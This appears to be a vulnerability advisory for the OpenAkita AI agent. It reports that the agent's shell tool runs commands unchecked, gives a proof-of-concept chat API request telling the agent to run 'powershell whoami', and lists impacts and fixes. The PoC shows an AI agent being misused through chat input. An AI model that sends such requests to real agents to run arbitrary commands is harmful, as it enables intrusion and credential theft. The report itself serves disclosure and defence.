OpenAkita provides an AI agent capable of executing shell commands on behalf of users. A local attacker can leverage this functionality to execute arbitrary commands in the context of the OpenAkita process. If the application is running with elevated privileges or the attacker can influence the AI’s decision-making, this results in privilege escalation.
Repo: https://github.com/openakita/openakita
| Attribute | Value |
|---|---|
| Vulnerability Type | Local Privilege Escalation / OS Command Injection |
| CWE ID | CWE-78 (Improper Neutralization of Special Elements used in an OS Command) |
| Attack Vector | Local |
| Attack Complexity | Low |
| Privileges Required | Low (Local user access) |
| User Interaction | Required |
| Scope | Unchanged |
Files:
src/openakita/tools/shell.py (Lines 179-286)src/openakita/tools/handlers/filesystem.py (Lines 153-256)# src/openakita/tools/shell.py:231-237
async def run(
self,
command: str,
cwd: str | None = None,
timeout: int | None = None,
env: dict | None = None,
) -> CommandResult:
# ...
process = await asyncio.create_subprocess_shell(
command, # User-provided command executed directly
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
cwd=work_dir,
env=cmd_env,
)
Scenario: Command Execution via Chat API
POST /api/chat HTTP/1.1
Host: 127.0.0.1:18900
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua-platform: "Windows"
Sec-Fetch-Site: none
Content-Type: application/json
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Fetch-User: ?1
sec-ch-ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Sec-Fetch-Mode: navigate
sec-ch-ua-mobile: ?0
Sec-Fetch-Dest: document
Upgrade-Insecure-Requests: 1
{
"message": "Run: powershell -c \\"whoami'\\""
}
| Impact Type | Description |
|---|---|
| Command Execution | Arbitrary OS commands run with OpenAkita process privileges |
| Data Access | Read/modify any file accessible to the process user |
| Credential Theft | Access to SSH keys, API tokens, password stores |
| Persistence | Install backdoors, cron jobs, startup scripts |
| Priority | Recommendation |
|---|---|
| High | Implement command allowlist/blocklist mechanism |
| High | Require explicit user confirmation for dangerous commands |
| Medium | Run shell commands in restricted environment (chroot, container) |
| Medium | Log all command executions for audit purposes |
| Low | Implement command timeout and resource limits |